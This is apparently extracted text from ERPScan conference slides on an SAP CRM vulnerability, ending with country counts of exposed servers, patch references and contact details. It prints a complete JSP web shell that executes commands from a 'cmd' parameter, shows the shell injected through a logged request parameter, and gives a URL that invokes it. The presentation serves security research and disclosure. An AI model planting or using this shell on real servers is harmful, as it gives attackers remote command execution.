![Page 95: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/95.jpg)
<%@ page import="java.util.*,java.io.*"%><%if (request.getParameter("cmd") != null){
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in);String disr = dis.readLine(); out.println ("<PRE>");while ( disr != null ){
out.println(disr);disr = dis.readLine();
}out.println ("</PRE>");
} %>
![Page 96: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/96.jpg)
![Page 97: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/97.jpg)
![Page 98: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/98.jpg)
...
#2.0#2018 02 11 13:21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction#
#CRM-ISA-
BBS#sap.com/crm~b2b#C000AC100A410073000004A90000110C#2213550000000004#s
ap.com/crm~b2b#com.sap.isa.user.action.LoginBaseAction#Guest#0##74C4C72B0F7111
E8B17500000021C6AE#c1229d500d1811e8a25b00000021c6ae#c1229d500d1811e8a25
b00000021c6ae#0#Thread[HTTP Worker
[@2035997437],5,Dedicated_Application_Thread]#Plain##request.parameter.["]<%@
page import="java.util.*,java.io.*"%><% if request.getParameter("cmd") !=
null){Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in); String disr = dis.readLine();
out.println("<PRE>"); while ( disr != null ) {out.println(disr);disr
=dis.readLine();}out.println("</PRE>");} %>["]="" #
#2.0#2018 02 11 13:21:01:332#0-800#Debug#com.sap.isa.user.action.LoginBaseAction#
...
![Page 99: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/99.jpg)
https://host:port/shell.jsp?cmd=ipconfig
![Page 100: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/100.jpg)
DEMO TIME
![Page 101: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/101.jpg)
![Page 102: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/102.jpg)
![Page 103: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/103.jpg)
78 United States42 India38 Chile28 Germany25 Brazil23 Australia19 France13 Singapore
12 Turkey
12 Taiwan
11 Spain
11 Republic of Korea
11 Colombia
10 Italy
9 Russian Federation
***
Almost 500 public SAP servers are Vulnerable
![Page 104: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/104.jpg)
PATCH
• Update CRM (2547431)
• Upgrade to Redwood 9
• Install SAP note 2486657(exploited in the wild)
![Page 105: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/105.jpg)
THANK YOU
USA:228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301Phone 650.798.5255
EU:
Luna ArenA 238 Herikerbergweg, 1101 CM AmsterdamPhone +31 20 8932892
EU:Štětkova 1638/18, Prague 4 - Nusle,
140 00, Czech Republic
Read our blogerpscan.com/category/press-center/blog/
Join our webinarserpscan.com/category/press-center/events/
Subscribe to our newsletterseepurl.com/bef7h1
10
5